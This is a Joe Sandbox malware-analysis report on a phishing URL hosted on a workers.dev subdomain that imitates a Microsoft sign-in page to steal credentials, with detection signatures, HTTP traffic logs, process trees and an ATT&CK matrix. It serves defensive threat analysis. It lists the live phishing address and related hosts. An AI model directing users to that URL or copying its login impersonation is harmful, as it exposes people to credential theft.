Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://nsjw.newf.workers.dev/

Overview

General Information

Sample URL:https://nsjw.newf.workers.dev/
Analysis ID:1427703
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Yara detected HtmlPhish6
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action

Classification

  • System is w10x64
  • chrome.exe (PID: 6064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2224,i,7554063841504006908,15893093035192475524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://nsjw.newf.workers.dev/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_HtmlPhish_6Yara detected HtmlPhish_6Joe Security
    0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://nsjw.newf.workers.dev/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: https://nsjw.newf.workers.dev/Matcher: Found strong image similarity, brand: MICROSOFT
      Source: https://nsjw.newf.workers.dev/Matcher: Template: microsoft matched
      Source: https://nsjw.newf.workers.dev/HTTP Parser: Number of links: 0
      Source: https://nsjw.newf.workers.dev/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://nsjw.newf.workers.dev/HTTP Parser: <input type="password" .../> found
      Source: https://nsjw.newf.workers.dev/HTTP Parser: No favicon
      Source: https://nsjw.newf.workers.dev/HTTP Parser: No <meta name="author".. found
      Source: https://nsjw.newf.workers.dev/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 23.201.212.130
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.73
      Source: unknownTCP traffic detected without corresponding DNS query: 96.7.245.27
      Source: unknownTCP traffic detected without corresponding DNS query: 96.7.245.27
      Source: unknownTCP traffic detected without corresponding DNS query: 23.40.205.73
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1Host: www.linkpicture.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /q/Screen-Shot-2022-01-30-at-10.27.21-PM.png HTTP/1.1Host: www.linkpicture.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://nsjw.newf.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: nsjw.newf.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: unknownDNS traffic detected: queries for: nsjw.newf.workers.dev
      Source: unknownHTTP traffic detected: POST /report/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsB HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 463Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 23:13:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingx-turbo-charged-by: LiteSpeedCache-Control: max-age=31536000CF-Cache-Status: HITAge: 947374Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87601ab22b2badcf-ATL
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 23:13:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: Accept-Encodingx-turbo-charged-by: LiteSpeedCache-Control: max-age=31536000CF-Cache-Status: HITAge: 947389Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0y9wf02%2B0sMuQfKjzUbPKI%2BE4ejHAzTfitHdf%2BZQDimsDIjJSC5cI1k%2F1id0BHYMYhjCyTk5fLErWgLQATFNZ1BWKz3SvDJ6Ze93MlwdjCXGcRS0TXfM5y9HbDaK%2BKtFkQvI9Uk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87601b111aaa453e-ATL
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownHTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: classification engineClassification label: mal72.phis.win@16/15@10/9
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2224,i,7554063841504006908,15893093035192475524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://nsjw.newf.workers.dev/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2224,i,7554063841504006908,15893093035192475524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://nsjw.newf.workers.dev/100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      part-0013.t-0009.t-msedge.net
      13.107.213.41
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          217.20.51.26
          truefalse
            unknown
            part-0029.t-0009.t-msedge.net
            13.107.246.57
            truefalse
              unknown
              www.linkpicture.com
              104.21.235.182
              truefalse
                unknown
                www.google.com
                64.233.177.105
                truefalse
                  high
                  nsjw.newf.workers.dev
                  104.21.50.103
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.211.108
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://www.linkpicture.com/q/Screen-Shot-2022-01-30-at-10.27.21-PM.pngfalse
                        unknown
                        https://nsjw.newf.workers.dev/true
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsBfalse
                            high
                            https://nsjw.newf.workers.dev/style.cssfalse
                              unknown
                              https://a.nel.cloudflare.com/report/v4?s=a0y9wf02%2B0sMuQfKjzUbPKI%2BE4ejHAzTfitHdf%2BZQDimsDIjJSC5cI1k%2F1id0BHYMYhjCyTk5fLErWgLQATFNZ1BWKz3SvDJ6Ze93MlwdjCXGcRS0TXfM5y9HbDaK%2BKtFkQvI9Ukfalse
                                high
                                https://nsjw.newf.workers.dev/favicon.icofalse
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.235.182
                                  www.linkpicture.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  13.107.246.57
                                  part-0029.t-0009.t-msedge.netUnited States
                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  64.233.177.105
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  172.67.204.185
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  13.107.213.41
                                  part-0013.t-0009.t-msedge.netUnited States
                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  35.190.80.1
                                  a.nel.cloudflare.comUnited States
                                  15169GOOGLEUSfalse
                                  104.21.50.103
                                  nsjw.newf.workers.devUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  192.168.2.4
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1427703
                                  Start date and time:2024-04-18 01:12:15 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 20s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:browseurl.jbs
                                  Sample URL:https://nsjw.newf.workers.dev/
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal72.phis.win@16/15@10/9
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.105.94, 142.250.105.101, 142.250.105.100, 142.250.105.138, 142.250.105.102, 142.250.105.113, 142.250.105.139, 64.233.185.84, 34.104.35.123, 142.251.15.95, 172.253.124.95, 108.177.122.95, 172.217.215.95, 64.233.177.95, 142.250.105.95, 74.125.136.95, 74.125.138.95, 142.250.9.95, 64.233.176.95, 173.194.219.95, 64.233.185.95, 40.127.169.103, 217.20.51.26, 192.229.211.108, 20.242.39.171, 173.194.219.94
